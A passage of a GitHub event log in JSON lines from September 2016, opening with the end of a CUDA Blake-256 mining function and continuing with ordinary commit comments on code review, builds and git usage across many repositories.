blakerounds);\r\n#else\r\n\t\t// GPU FULL HASH\r\n\t\tuint32_t foundNonce =\tblake256_cpu_hash_80(thr_id, throughput, pdata[19], targetHigh, crcsum, blakerounds);\r\n#endif\r\n\t\tif(stop_mining) {mining_has_stopped[thr_id] = true; cudaStreamDestroy(gpustream[thr_id]); pthread_exit(nullptr);}\r\n\t\tif(foundNonce != UINT32_MAX)\r\n\t\t{\r\n\t\t\tuint32_t vhashcpu[8] = { 0 };\r\n\r\n\t\t\tfor (int k=0; k < 19; k++)\r\n\t\t\t\tbe32enc(&endiandata[k], pdata[k]);\r\n\r\n\t\t\tif(opt_verify)\r\n\t\t\t{\r\n\t\t\t\tbe32enc(&endiandata[19], foundNonce);\r\n\t\t\t\tblake256hash(vhashcpu, endiandata, blakerounds);\r\n\t\t\t}\r\n\t\t\t//applog(LOG_BLUE, \"%08x %16llx\", vhashcpu[6], targetHigh);\r\n\t\t\tif (vhashcpu[7] <= target7 && fulltest(vhashcpu, ptarget))\r\n\t\t\t{\r\n\t\t\t\tif (opt_benchmark) applog(LOG_INFO, \"GPU #%d Found nounce %08x\", thr_id, foundNonce);\r\n\t\t\t\trc = 1;\r\n\t\t\t\t*hashes_done = pdata[19] - first_nonce + throughput;\r\n\t\t\t\tpdata[19] = foundNonce;\r\n#if NBN > 1\r\n\t\t\t\tif (extra_results[thr_id][0] != UINT32_MAX)\r\n\t\t\t\t{\r\n\t\t\t\t\tif(opt_verify)\r\n\t\t\t\t\t{\r\n\t\t\t\t\t\tbe32enc(&endiandata[19], extra_results[thr_id][0]);\r\n\t\t\t\t\t\tblake256hash(vhashcpu, endiandata, blakerounds);\r\n\t\t\t\t\t}\r\n\t\t\t\t\tif (vhashcpu[7] <= target7 && fulltest(vhashcpu, ptarget))\r\n\t\t\t\t\t{\r\n\t\t\t\t\t\tpdata[21] = extra_results[thr_id][0];\r\n\t\t\t\t\t\tif(opt_benchmark) applog(LOG_INFO, \"GPU #%d Found second nounce %08x\", thr_id, extra_results[thr_id][0]);\r\n//\t\t\t\t\t\tapplog(LOG_BLUE, \"1:%x 2:%x\", foundNonce, extra_results[thr_id][0]);\r\n\t\t\t\t\t\trc = 2;\r\n\t\t\t\t\t}\r\n\t\t\t\t\telse\r\n\t\t\t\t\t{\r\n\t\t\t\t\t\tif(vhashcpu[7]>target7)\r\n\t\t\t\t\t\t\tapplog(LOG_ERR, \"GPU #%d: result for second nonce %08x does not validate on CPU!\", device_map[thr_id], extra_results[thr_id][0]);\r\n\t\t\t\t\t}\r\n\t\t\t\t\textra_results[thr_id][0] = UINT32_MAX;\r\n\t\t\t\t}\r\n#endif\r\n\t\t\t\t//applog_hash((uint8_t*)ptarget);\r\n\t\t\t\t//applog_compare_hash((uint8_t*)vhashcpu,(uint8_t*)ptarget);\r\n\t\t\t\treturn rc;\r\n\t\t\t}\r\n\t\t\telse\r\n\t\t\t{\r\n\t\t\t\tif(opt_debug)\r\n\t\t\t\t{\r\n\t\t\t\t\tapplog_hash((uchar*)ptarget);\r\n\t\t\t\t\tapplog_compare_hash((uchar*)vhashcpu, (uchar*)ptarget);\r\n\t\t\t\t}\r\n\t\t\t\tif(vhashcpu[7]>target7)\r\n\t\t\t\t\tapplog(LOG_ERR, \"GPU #%d: result for nonce %08x does not validate on CPU!\", device_map[thr_id], foundNonce);\r\n\t\t\t}\r\n\t\t}\r\n\r\n\t\tpdata[19] += throughput; CUDA_SAFE_CALL(cudaGetLastError());\r\n\t} while (!work_restart[thr_id].restart && ((uint64_t)max_nonce > ((uint64_t)(pdata[19]) + (uint64_t)throughput)));\r\n\r\n\t*hashes_done = pdata[19] - first_nonce ;\r\n\r\n\treturn rc;\r\n}"}},"created_at":"2016-09-15T09:03:57Z"}
{"id":"4566891467","type":"CommitCommentEvent","actor":{"login":"parmentf"},"repo":{"name":"Inist-CNRS/ezmaster"},"payload":{"comment":{"id":19032683,"position":105,"line":53,"path":"helpers/app.js","commit_id":"2b3f2194315eeff6806a25a4ca28815c433d8205","created_at":"2016-09-15T09:04:03Z","updated_at":"2016-09-15T09:04:03Z","body":"Il y a le même problème avec le helper instances.js: https://github.com/Inist-CNRS/ezmaster/blob/master/helpers/instances.js#L90-L92"}},"created_at":"2016-09-15T09:04:03Z"}
{"id":"4566901685","type":"CommitCommentEvent","actor":{"login":"PavelDvorak"},"repo":{"name":"PavelDvorak/hello-world"},"payload":{"comment":{"id":19032698,"position":4,"line":5,"path":"README.md","commit_id":"fe60034bc1f0cc09a27c855bda246d2686d0cfcf","created_at":"2016-09-15T09:06:14Z","updated_at":"2016-09-15T09:06:14Z","body":"added a new line"}},"created_at":"2016-09-15T09:06:14Z"}
{"id":"4566903446","type":"CommitCommentEvent","actor":{"login":"kkrysiak"},"repo":{"name":"fgomez02/useful_code"},"payload":{"comment":{"id":19032702,"position":69,"line":69,"path":"Survival_Chi_square_5.R","commit_id":"3a36a2fcb7d024e42bddb4876c04bc8541d4afa9","created_at":"2016-09-15T09:06:37Z","updated_at":"2016-09-15T09:06:37Z","body":"Good call. I didn't catch that. "}},"created_at":"2016-09-15T09:06:37Z"}
{"id":"4566903454","type":"CommitCommentEvent","actor":{"login":"GavriYashar"},"repo":{"name":"GavriYashar/Matlab-Editor-Plugin"},"payload":{"comment":{"id":19032703,"position":null,"line":null,"path":null,"commit_id":"0ca5dfde4b6bd5ea2d71926310352d73ad92e103","created_at":"2016-09-15T09:06:37Z","updated_at":"2016-09-15T09:06:37Z","body":"#9"}},"created_at":"2016-09-15T09:06:37Z"}
{"id":"4566904142","type":"CommitCommentEvent","actor":{"login":"GrCOTE7"},"repo":{"name":"chemin2bonheur/prelancement"},"payload":{"comment":{"id":19032704,"position":null,"line":null,"path":null,"commit_id":"b40ff0adaecfbed88488cc743ab0bad14d3f5cf0","created_at":"2016-09-15T09:06:46Z","updated_at":"2016-09-15T09:06:46Z","body":"Opt = Optimisation"}},"created_at":"2016-09-15T09:06:46Z"}
{"id":"4566905393","type":"CommitCommentEvent","actor":{"login":"kkrysiak"},"repo":{"name":"fgomez02/useful_code"},"payload":{"comment":{"id":19032708,"position":170,"line":170,"path":"Survival_Chi_square_5.R","commit_id":"3a36a2fcb7d024e42bddb4876c04bc8541d4afa9","created_at":"2016-09-15T09:07:05Z","updated_at":"2016-09-15T09:07:05Z","body":"Doesn't have to be changed, just another approach. "}},"created_at":"2016-09-15T09:07:05Z"}
{"id":"4566908798","type":"CommitCommentEvent","actor":{"login":"shivapoudel"},"repo":{"name":"woothemes/woocommerce"},"payload":{"comment":{"id":19032720,"position":13,"line":18,"path":"composer.json","commit_id":"486449bf07a347e3df339d2ad1cd501b38c2eeda","created_at":"2016-09-15T09:07:50Z","updated_at":"2016-09-15T09:07:50Z","body":"@claudiosmweb I mean to say `vendor/wimg/php-compatibility` is not listed in `CodeSniffer.conf` as theres space instead of `,`. Additionally, can you index `bash ./vendor/......` so that windows users can force run the script through bash rather than default cmd. Although I use bash this kind of script is processed in default cmd so :)"}},"created_at":"2016-09-15T09:07:50Z"}
{"id":"4566909259","type":"CommitCommentEvent","actor":{"login":"olivieer"},"repo":{"name":"olivieer/android_kernel_sony_msm8994"},"payload":{"comment":{"id":19032722,"position":null,"line":null,"path":null,"commit_id":"4665bfc0c2f9e31d7b17956878ee2a3c6c6fdb92","created_at":"2016-09-15T09:07:56Z","updated_at":"2016-09-15T09:07:56Z","body":"The MHL driver doesn't seem to work on Z5 - @erikcas has also had issues with it."}},"created_at":"2016-09-15T09:07:56Z"}
{"id":"4566911758","type":"CommitCommentEvent","actor":{"login":"mlindauer"},"repo":{"name":"automl/SMAC3"},"payload":{"comment":{"id":19032730,"position":14,"line":154,"path":"smac/smbo/smbo.py","commit_id":"4f186e57b37c24d82a1229bb3c0d6f7fe63bb6bc","created_at":"2016-09-15T09:08:29Z","updated_at":"2016-09-15T09:08:29Z","body":"the other way around makes me worry even more. If we add new TAE which support memory, we always have to touch the smbo class? I don't think that such TAE specific code should be in the smbo."}},"created_at":"2016-09-15T09:08:29Z"}
{"id":"4566913884","type":"CommitCommentEvent","actor":{"login":"eregon"},"repo":{"name":"jruby/jruby"},"payload":{"comment":{"id":19032738,"position":20,"line":903,"path":"truffle/src/main/java/org/jruby/truffle/core/kernel/KernelNodes.java","commit_id":"a9b6515c8472b279bee2a085c09d185c49e656c6","created_at":"2016-09-15T09:08:59Z","updated_at":"2016-09-15T09:08:59Z","body":"Should the seed be passed to start? I think that's how Array#hash did it, isn't it?"}},"created_at":"2016-09-15T09:08:59Z"}
{"id":"4566914497","type":"CommitCommentEvent","actor":{"login":"superplan"},"repo":{"name":"superplan/zinsrechner"},"payload":{"comment":{"id":19032741,"position":null,"line":null,"path":null,"commit_id":"104cffc8e5938860e97575db78f161c355e118b1","created_at":"2016-09-15T09:09:09Z","updated_at":"2016-09-15T09:09:09Z","body":"verworfen"}},"created_at":"2016-09-15T09:09:09Z"}
{"id":"4566919851","type":"CommitCommentEvent","actor":{"login":"Tormentor667"},"repo":{"name":"Realm667/WolfenDoom"},"payload":{"comment":{"id":19032751,"position":null,"line":null,"path":null,"commit_id":"0c1d4ccd503fc5d952ca3093395637f1999d697f","created_at":"2016-09-15T09:10:20Z","updated_at":"2016-09-15T09:10:20Z","body":"If things aren't working perfectly I'd suggest you get in contact with Gez and the other people from the ZDoom thread, I am sure they can help."}},"created_at":"2016-09-15T09:10:20Z"}
{"id":"4566920778","type":"CommitCommentEvent","actor":{"login":"eregon"},"repo":{"name":"jruby/jruby"},"payload":{"comment":{"id":19032753,"position":33,"line":1205,"path":"truffle/src/main/java/org/jruby/truffle/core/numeric/FixnumNodes.java","commit_id":"a9b6515c8472b279bee2a085c09d185c49e656c6","created_at":"2016-09-15T09:10:32Z","updated_at":"2016-09-15T09:10:32Z","body":"These 3 specializations above are not needed, due to the implicit cast int=>long."}},"created_at":"2016-09-15T09:10:32Z"}
{"id":"4566922787","type":"CommitCommentEvent","actor":{"login":"kkrysiak"},"repo":{"name":"fgomez02/useful_code"},"payload":{"comment":{"id":19032757,"position":null,"line":null,"path":null,"commit_id":"3a36a2fcb7d024e42bddb4876c04bc8541d4afa9","created_at":"2016-09-15T09:10:58Z","updated_at":"2016-09-15T09:10:58Z","body":"The way we are counting gene recurrence in rec_mgi_b is very naive. I bet if you just subset the final filtered variant list on CREBBP you would see 20 individuals with 30 mutations. That 1/2 of them had CREBBP mutations seems a bit high though. If that is true, that may be of interest. Or we have an artifact that leaked through. "}},"created_at":"2016-09-15T09:10:58Z"}
{"id":"4566926117","type":"CommitCommentEvent","actor":{"login":"kkrysiak"},"repo":{"name":"fgomez02/useful_code"},"payload":{"comment":{"id":19032769,"position":null,"line":null,"path":null,"commit_id":"3a36a2fcb7d024e42bddb4876c04bc8541d4afa9","created_at":"2016-09-15T09:11:43Z","updated_at":"2016-09-15T09:11:43Z","body":"But this is only a theory and should be checked. "}},"created_at":"2016-09-15T09:11:43Z"}
{"id":"4566926141","type":"CommitCommentEvent","actor":{"login":"rouazana"},"repo":{"name":"linagora/james-project"},"payload":{"comment":{"id":19032770,"position":4,"line":175,"path":"mailet/base/src/test/java/org/apache/mailet/base/test/FakeMail.java","commit_id":"6930faaa8b3dfbfd9ecb8ef78fd08567899e6dae","created_at":"2016-09-15T09:11:43Z","updated_at":"2016-09-15T09:11:43Z","body":"ok :)"}},"created_at":"2016-09-15T09:11:43Z"}
{"id":"4566926378","type":"CommitCommentEvent","actor":{"login":"claudiosmweb"},"repo":{"name":"woothemes/woocommerce"},"payload":{"comment":{"id":19032771,"position":13,"line":18,"path":"composer.json","commit_id":"486449bf07a347e3df339d2ad1cd501b38c2eeda","created_at":"2016-09-15T09:11:46Z","updated_at":"2016-09-15T09:11:46Z","body":"Ohh yeah, but I will check this right, not sure why we need this `wimg/php-compatibility`, now I see that looks like we don't use it."}},"created_at":"2016-09-15T09:11:46Z"}
{"id":"4566934317","type":"CommitCommentEvent","actor":{"login":"borshop"},"repo":{"name":"basho/riak_kv"},"payload":{"comment":{"id":19032786,"position":null,"line":null,"path":null,"commit_id":"709b4e5758e997f888e5c0356e46640cdd5a4388","created_at":"2016-09-15T09:13:30Z","updated_at":"2016-09-15T09:13:30Z","body":"saw approval from andytill\nat https://github.com/basho/riak_kv/commit/709b4e5758e997f888e5c0356e46640cdd5a4388"}},"created_at":"2016-09-15T09:13:30Z"}
{"id":"4566934352","type":"CommitCommentEvent","actor":{"login":"borshop"},"repo":{"name":"basho/riak_kv"},"payload":{"comment":{"id":19032787,"position":null,"line":null,"path":null,"commit_id":"709b4e5758e997f888e5c0356e46640cdd5a4388","created_at":"2016-09-15T09:13:31Z","updated_at":"2016-09-15T09:13:31Z","body":"merging basho/riak_kv/fix-az-explain_column_type = 709b4e57 into borshop-integration-1478-fix-az-explain_column_type"}},"created_at":"2016-09-15T09:13:31Z"}
{"id":"4566934379","type":"CommitCommentEvent","actor":{"login":"borshop"},"repo":{"name":"basho/riak_kv"},"payload":{"comment":{"id":19032789,"position":null,"line":null,"path":null,"commit_id":"709b4e5758e997f888e5c0356e46640cdd5a4388","created_at":"2016-09-15T09:13:31Z","updated_at":"2016-09-15T09:13:31Z","body":"basho/riak_kv/fix-az-explain_column_type = 709b4e57 merged ok, testing candidate = c32b52de"}},"created_at":"2016-09-15T09:13:31Z"}
{"id":"4566936677","type":"CommitCommentEvent","actor":{"login":"cameel"},"repo":{"name":"Code-Poets/sandbox"},"payload":{"comment":{"id":19032797,"position":15,"line":15,"path":"mandryl/tango_with_django_project/rango/views.py","commit_id":"c7737a0c153fbe8f397f56c7d3b072f81888777d","created_at":"2016-09-15T09:14:02Z","updated_at":"2016-09-15T09:14:02Z","body":"ラヌゴじゃない"}},"created_at":"2016-09-15T09:14:02Z"}
{"id":"4566939132","type":"CommitCommentEvent","actor":{"login":"sourcebits-vijayalakshmip"},"repo":{"name":"sourcebits-vijayalakshmip/SimpleProject"},"payload":{"comment":{"id":19032803,"position":5,"line":3,"path":"README.md","commit_id":"54eb5b798195fa898ee67b083cdc47338ba62992","created_at":"2016-09-15T09:14:33Z","updated_at":"2016-09-15T09:14:33Z","body":"// hi"}},"created_at":"2016-09-15T09:14:33Z"}
{"id":"4566941217","type":"CommitCommentEvent","actor":{"login":"epikjjh"},"repo":{"name":"HyOsori/Osori-Algorithm"},"payload":{"comment":{"id":19032807,"position":null,"line":null,"path":null,"commit_id":"91fe2099572d5e6721d4dae9590eee082b6bc753","created_at":"2016-09-15T09:15:01Z","updated_at":"2016-09-15T09:15:01Z","body":"I tried to git push, but i met this message...\r\nTo https://github.com/HyOsori/Osori-Algorithm.git\r\n ! [rejected]        master -> master (fetch first)\r\nerror: failed to push some refs to 'https://github.com/HyOsori/Osori-Algorithm.git'\r\nhint: Updates were rejected because the remote contains work that you do\r\nhint: not have locally. This is usually caused by another repository pushing\r\nhint: to the same ref. You may want to first integrate the remote changes\r\nhint: (e.g., 'git pull ...') before pushing again.\r\nhint: See the 'Note about fast-forwards' in 'git push --help' for details.\r\nso I just uploaded this file. could you help me to git push correctly?"}},"created_at":"2016-09-15T09:15:01Z"}
{"id":"4566946110","type":"CommitCommentEvent","actor":{"login":"shivapoudel"},"repo":{"name":"woothemes/woocommerce"},"payload":{"comment":{"id":19032813,"position":13,"line":18,"path":"composer.json","commit_id":"486449bf07a347e3df339d2ad1cd501b38c2eeda","created_at":"2016-09-15T09:16:03Z","updated_at":"2016-09-15T09:16:03Z","body":"Please also add `bash ./vendor....` so we windows users wont be culprit :)"}},"created_at":"2016-09-15T09:16:03Z"}
{"id":"4566957579","type":"CommitCommentEvent","actor":{"login":"fgomez02"},"repo":{"name":"fgomez02/useful_code"},"payload":{"comment":{"id":19032828,"position":null,"line":null,"path":null,"commit_id":"3a36a2fcb7d024e42bddb4876c04bc8541d4afa9","created_at":"2016-09-15T09:18:38Z","updated_at":"2016-09-15T09:18:38Z","body":"Ohh! OK. right because that matrix is just counting whether or not a gene\nis mutated, not the number of times it is mutated.  OK.  That makes sense.\nI was nervous that I had messed something up!\n\nOn Thu, Sep 15, 2016 at 4:10 AM, Kilannin Krysiak <notifications@github.com>\nwrote:\n\n> The way we are counting gene recurrence in rec_mgi_b is very naive. I bet\n> if you just subset the final filtered variant list on CREBBP you would see\n> 20 individuals with 30 mutations. That 1/2 of them had CREBBP mutations\n> seems a bit high though. If that is true, that may be of interest. Or we\n> have an artifact that leaked through.\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/fgomez02/useful_code/commit/3a36a2fcb7d024e42bddb4876c04bc8541d4afa9#commitcomment-19032757>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/APJJDziNbZAtgaJQFQXbl7KmHC8CUSEIks5qqQujgaJpZM4J9SXr>\n> .\n>\n"}},"created_at":"2016-09-15T09:18:38Z"}
{"id":"4566957674","type":"CommitCommentEvent","actor":{"login":"krrr"},"repo":{"name":"krrr/CMCC-EDU-autologin"},"payload":{"comment":{"id":19032829,"position":null,"line":null,"path":null,"commit_id":"8ba49348d02efff6f00d22b5fba3b67a8b008c03","created_at":"2016-09-15T09:18:40Z","updated_at":"2016-09-15T09:18:40Z","body":"小学英语水平"}},"created_at":"2016-09-15T09:18:40Z"}
{"id":"4566961175","type":"CommitCommentEvent","actor":{"login":"jbreckmckye"},"repo":{"name":"newrelic/node-newrelic"},"payload":{"comment":{"id":19032838,"position":null,"line":null,"path":null,"commit_id":"01486debd760628f7eb83a13c7a92a9ec5352fdd","created_at":"2016-09-15T09:19:26Z","updated_at":"2016-09-15T09:19:26Z","body":"@travi Mutable package repositories have always seemed to me like a liability waiting to bite."}},"created_at":"2016-09-15T09:19:26Z"}
{"id":"4566962926","type":"CommitCommentEvent","actor":{"login":"anakeen-bot"},"repo":{"name":"Anakeen/dynacase-control"},"payload":{"comment":{"id":19032843,"position":null,"line":null,"path":null,"commit_id":"f092e8f6e7f8ac55653fdc3a95fd3d6a81a93532","created_at":"2016-09-15T09:19:50Z","updated_at":"2016-09-15T09:19:50Z","body":"(f092e8f) The title of the commit doesn't respect guideline (\"type(scope): title (refs #<number>[, ...])\")"}},"created_at":"2016-09-15T09:19:50Z"}
{"id":"4566966586","type":"CommitCommentEvent","actor":{"login":"m-kuhn"},"repo":{"name":"opengisch/QField"},"payload":{"comment":{"id":19032847,"position":null,"line":null,"path":null,"commit_id":"63c71519f872fdcd5b668f3e551d82bb0cdb9907","created_at":"2016-09-15T09:20:36Z","updated_at":"2016-09-15T09:20:36Z","body":"    git pull --rebase # is your friend\r\n\r\n;)"}},"created_at":"2016-09-15T09:20:36Z"}
{"id":"4566971786","type":"CommitCommentEvent","actor":{"login":"AlekSi"},"repo":{"name":"hashicorp/consul"},"payload":{"comment":{"id":19032853,"position":12,"line":12,"path":"main.go","commit_id":"1c5a8d01b100113c9d50464d2a2047939af57e01","created_at":"2016-09-15T09:21:44Z","updated_at":"2016-09-15T09:21:44Z","body":"A lot of people in our chat are curious why you decided to extract `realMain`. A lot of opinions were said, but we don't know if any is correct. Can you tell us *the Truth*?"}},"created_at":"2016-09-15T09:21:44Z"}
{"id":"4566972652","type":"CommitCommentEvent","actor":{"login":"mfeurer"},"repo":{"name":"automl/SMAC3"},"payload":{"comment":{"id":19032855,"position":14,"line":154,"path":"smac/smbo/smbo.py","commit_id":"4f186e57b37c24d82a1229bb3c0d6f7fe63bb6bc","created_at":"2016-09-15T09:21:55Z","updated_at":"2016-09-15T09:21:55Z","body":"Sorry, I think this is the easiest way to keep consistency (although very conservative). Rather than not providing any warning to the user, we raise an exception. A different approach would be to add it to the abstract TAE class in the constructor which fails if a memory limit is given and the subclass does not have the private argument `_supports_memory_limit`. What do you think of this?"}},"created_at":"2016-09-15T09:21:55Z"}
{"id":"4566972711","type":"CommitCommentEvent","actor":{"login":"yyuho"},"repo":{"name":"aidma-playground/socket.io-chat"},"payload":{"comment":{"id":19032856,"position":7,"line":14,"path":"client.js","commit_id":"c4eefdb37bc81e246eee0adaa2fa584f2a4b9527","created_at":"2016-09-15T09:21:56Z","updated_at":"2016-09-15T09:21:56Z","body":"変更しました。\r\nhttps://github.com/aidma-playground/socket.io-chat/commit/6086c0a6fd58de45c7694ef265f9533ee3e2a910"}},"created_at":"2016-09-15T09:21:56Z"}
{"id":"4566976881","type":"CommitCommentEvent","actor":{"login":"tbazant"},"repo":{"name":"SUSE/doc-ses"},"payload":{"comment":{"id":19032862,"position":null,"line":null,"path":null,"commit_id":"5739c0a34e0ffca5c5efcce8e97c889760962118","created_at":"2016-09-15T09:22:53Z","updated_at":"2016-09-15T09:22:53Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;gSuQlWnf&#x2F;1943-document-iscsi-gateway-upgrade-procedure\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> Document iSCSI gateway upgrade procedure</a>"}},"created_at":"2016-09-15T09:22:53Z"}
{"id":"4566981079","type":"CommitCommentEvent","actor":{"login":"AgileFreaksBuildServer"},"repo":{"name":"Agilefreaks/todo"},"payload":{"comment":{"id":19032870,"position":null,"line":null,"path":null,"commit_id":"2db73993e8620aca31318a29b57b8dcde8835edf","created_at":"2016-09-15T09:23:50Z","updated_at":"2016-09-15T09:23:50Z","body":"TeamCity Todo :: Build [Build 99](http://109.103.226.38:8512/viewLog.html?buildId=38494&buildTypeId=Todo_Build) is now running\n"}},"created_at":"2016-09-15T09:23:50Z"}
{"id":"4566983076","type":"CommitCommentEvent","actor":{"login":"AgileFreaksBuildServer"},"repo":{"name":"Agilefreaks/todo"},"payload":{"comment":{"id":19032874,"position":null,"line":null,"path":null,"commit_id":"2db73993e8620aca31318a29b57b8dcde8835edf","created_at":"2016-09-15T09:24:16Z","updated_at":"2016-09-15T09:24:16Z","body":"TeamCity Todo :: Build [Build 99](http://109.103.226.38:8512/viewLog.html?buildId=38494&buildTypeId=Todo_Build) outcome was **SUCCESS**\nSummary: Tests passed: 12 Build time: 00:00:23"}},"created_at":"2016-09-15T09:24:16Z"}
{"id":"4566987262","type":"CommitCommentEvent","actor":{"login":"evpobr"},"repo":{"name":"erikd/libsndfile"},"payload":{"comment":{"id":19032880,"position":null,"line":null,"path":null,"commit_id":"a603d70bb8fe013f2ee67dbea594ca6a8c3ddf69","created_at":"2016-09-15T09:25:10Z","updated_at":"2016-09-15T09:25:10Z","body":"I'm working on it."}},"created_at":"2016-09-15T09:25:10Z"}
{"id":"4566987436","type":"CommitCommentEvent","actor":{"login":"mlindauer"},"repo":{"name":"automl/SMAC3"},"payload":{"comment":{"id":19032882,"position":14,"line":154,"path":"smac/smbo/smbo.py","commit_id":"4f186e57b37c24d82a1229bb3c0d6f7fe63bb6bc","created_at":"2016-09-15T09:25:12Z","updated_at":"2016-09-15T09:25:12Z","body":"I don't know whether doing it in the abstract TAE will lead us to transparent code. But I like it a lot more than the code in the smbo. So, fine with me."}},"created_at":"2016-09-15T09:25:12Z"}
{"id":"4566990265","type":"CommitCommentEvent","actor":{"login":"DeepSOIC"},"repo":{"name":"FreeCAD/FreeCAD"},"payload":{"comment":{"id":19032892,"position":19,"line":502,"path":"src/Mod/PartDesign/Gui/Utils.cpp","commit_id":"b68bce11de7ebf3c3b4d8d2abae2bb1617d2baf3","created_at":"2016-09-15T09:25:46Z","updated_at":"2016-09-15T09:25:46Z","body":"Hi!\r\nIf there is a dependency loop, this routine will cause endless recursion and will run out of stack, or memory, potentially causing a crash."}},"created_at":"2016-09-15T09:25:46Z"}
{"id":"4566991384","type":"CommitCommentEvent","actor":{"login":"ananya-bhattacharya"},"repo":{"name":"ananya-bhattacharya/hydrator-plugins"},"payload":{"comment":{"id":19032896,"position":null,"line":null,"path":null,"commit_id":"b8847a21c6f20b935db7312715939cc9eb424ae1","created_at":"2016-09-15T09:26:01Z","updated_at":"2016-09-15T09:26:01Z","body":"Squashing and merging."}},"created_at":"2016-09-15T09:26:01Z"}
{"id":"4566992418","type":"CommitCommentEvent","actor":{"login":"brettwooldridge"},"repo":{"name":"brettwooldridge/HikariCP"},"payload":{"comment":{"id":19032900,"position":null,"line":null,"path":null,"commit_id":"5e05adcd27ceeaa4b6b5a23930505f99ff3b0644","created_at":"2016-09-15T09:26:15Z","updated_at":"2016-09-15T09:26:15Z","body":"@nitincchauhan ``lastConnectionFailure`` is *global* while ``isConnectionAlive()`` is per-connection.  The fact that an existing connection \"is alive\" has no effect on whether or not new connections cannot be created due to an exception.\r\n"}},"created_at":"2016-09-15T09:26:15Z"}
{"id":"4566992671","type":"CommitCommentEvent","actor":{"login":"Fender123"},"repo":{"name":"davedevelopment/phpmig"},"payload":{"comment":{"id":19032902,"position":null,"line":null,"path":null,"commit_id":"cd37044a79d95fcbbe83eecc0b3ace3ed34fdb59","created_at":"2016-09-15T09:26:18Z","updated_at":"2016-09-15T09:26:18Z","body":"@micahaza see https://github.com/davedevelopment/phpmig/pull/111#issuecomment-247272976"}},"created_at":"2016-09-15T09:26:18Z"}
{"id":"4566993643","type":"CommitCommentEvent","actor":{"login":"ytest1"},"repo":{"name":"yaegor/sandbox"},"payload":{"comment":{"id":19032903,"position":null,"line":null,"path":null,"commit_id":"29a892f6a28a759dd30037b1b0c91b921ca86b25","created_at":"2016-09-15T09:26:29Z","updated_at":"2016-09-15T09:26:29Z","body":"TeamCity Branches Tests :: Git yaegor sandbox [Build 27](http://munit-050:8112/tc/viewLog.html?buildId=99039&buildTypeId=BranchesTests_GitYaegorSandbox) is now running\n"}},"created_at":"2016-09-15T09:26:29Z"}
{"id":"4566996225","type":"CommitCommentEvent","actor":{"login":"macropin"},"repo":{"name":"IRNAS/Troublemaker2"},"payload":{"comment":{"id":19032908,"position":null,"line":null,"path":null,"commit_id":"3feb24c522f09800f330568e186ed6ba891ef1bf","created_at":"2016-09-15T09:27:04Z","updated_at":"2016-09-15T09:27:04Z","body":"Oh no worries. It looked like a mistake because the commit message did not reference these improvements."}},"created_at":"2016-09-15T09:27:04Z"}
{"id":"4566998520","type":"CommitCommentEvent","actor":{"login":"mauricewillemsen"},"repo":{"name":"peace-4-you/TI2206-2016-2017"},"payload":{"comment":{"id":19032912,"position":null,"line":null,"path":null,"commit_id":"b9cf8f24757cddfeed9add5cc785328a8c7bc524","created_at":"2016-09-15T09:27:32Z","updated_at":"2016-09-15T09:27:32Z","body":"@peace-4-you another thing, add a method that returns true if there's a bubble beneath the lowest row, so the game can end failed"}},"created_at":"2016-09-15T09:27:32Z"}
{"id":"4566999746","type":"CommitCommentEvent","actor":{"login":"AegelThall"},"repo":{"name":"EpsLeonid/Student2016"},"payload":{"comment":{"id":19032915,"position":null,"line":null,"path":null,"commit_id":"42c8149002b53668fd7efdace9adea4add5d963b","created_at":"2016-09-15T09:27:47Z","updated_at":"2016-09-15T09:27:47Z","body":"Ееееее, первые удаления начались!)"}},"created_at":"2016-09-15T09:27:47Z"}
{"id":"4567001182","type":"CommitCommentEvent","actor":{"login":"jefleponot"},"repo":{"name":"casperjs/casperjs"},"payload":{"comment":{"id":19032920,"position":null,"line":null,"path":null,"commit_id":"d7b4f7f2362a9d2fbd38bc35bc16054c8f15282f","created_at":"2016-09-15T09:28:07Z","updated_at":"2016-09-15T09:28:07Z","body":"thanks"}},"created_at":"2016-09-15T09:28:07Z"}
{"id":"4567003242","type":"CommitCommentEvent","actor":{"login":"yulianglukhenko"},"repo":{"name":"infinitered/thesis-phoenix"},"payload":{"comment":{"id":19032925,"position":19,"line":28,"path":"lib/thesis/stores/ecto_store.ex","commit_id":"ef2f32b75a4601d3de0322278a31d7416a200778","created_at":"2016-09-15T09:28:32Z","updated_at":"2016-09-15T09:28:32Z","body":"this will never happen. page/1 won't return a struct if you give it nill @jamonholmgren "}},"created_at":"2016-09-15T09:28:32Z"}
{"id":"4567003443","type":"CommitCommentEvent","actor":{"login":"RyTekk"},"repo":{"name":"olivieer/android_kernel_sony_msm8994"},"payload":{"comment":{"id":19032926,"position":null,"line":null,"path":null,"commit_id":"4665bfc0c2f9e31d7b17956878ee2a3c6c6fdb92","created_at":"2016-09-15T09:28:34Z","updated_at":"2016-09-15T09:28:34Z","body":"Thank you so much for the answers."}},"created_at":"2016-09-15T09:28:34Z"}
{"id":"4567003762","type":"CommitCommentEvent","actor":{"login":"tombentley"},"repo":{"name":"ceylon/ceylon"},"payload":{"comment":{"id":19032928,"position":null,"line":null,"path":null,"commit_id":"060e26f1fec9b06ec63219edd87fe2d181f10003","created_at":"2016-09-15T09:28:38Z","updated_at":"2016-09-15T09:28:38Z","body":"Did you test this with all of the tools, or just the troublesome one(s)?"}},"created_at":"2016-09-15T09:28:38Z"}
{"id":"4567004845","type":"CommitCommentEvent","actor":{"login":"Nyks45"},"repo":{"name":"Nyks45/OctoDex-Kernel"},"payload":{"comment":{"id":19032934,"position":null,"line":null,"path":null,"commit_id":"bcdb9e8b49c03036b3f3c6627e5800f46d27a763","created_at":"2016-09-15T09:28:53Z","updated_at":"2016-09-15T09:28:53Z","body":"i think u gotta be kidding me after all that edits on script what is belong to u ?kernel packing codes ??every idiot can do that\r\nhttps://github.com/Nyks45/OctoDex-Kernel/commit/e94da600ac0822124ede262ae42825699dd5da24 u can see what left from old script clearly\r\ntell me what every idiot can't do in this script that left from u\r\nexperting ver? last time i look it wasn't even exist on script\r\nexport bzimage defconfig? which one clearly belongs to u and if exist ON ANY OTHER SCRİPT MAKES MAKES THAT SCRIPT BELONGS TO U????english non code lines?? if u care about them i can change \r\nif i really wanted to kang from u i would create anykernek zenfone 2 cmmit that show belongs to u\r\nthere is spesificly something that shows belongs to u\r\nyes i agree in anykernel there some spesific changes but not in kernel u can't want credit there is a spesifix fix for zenfone 2 ? 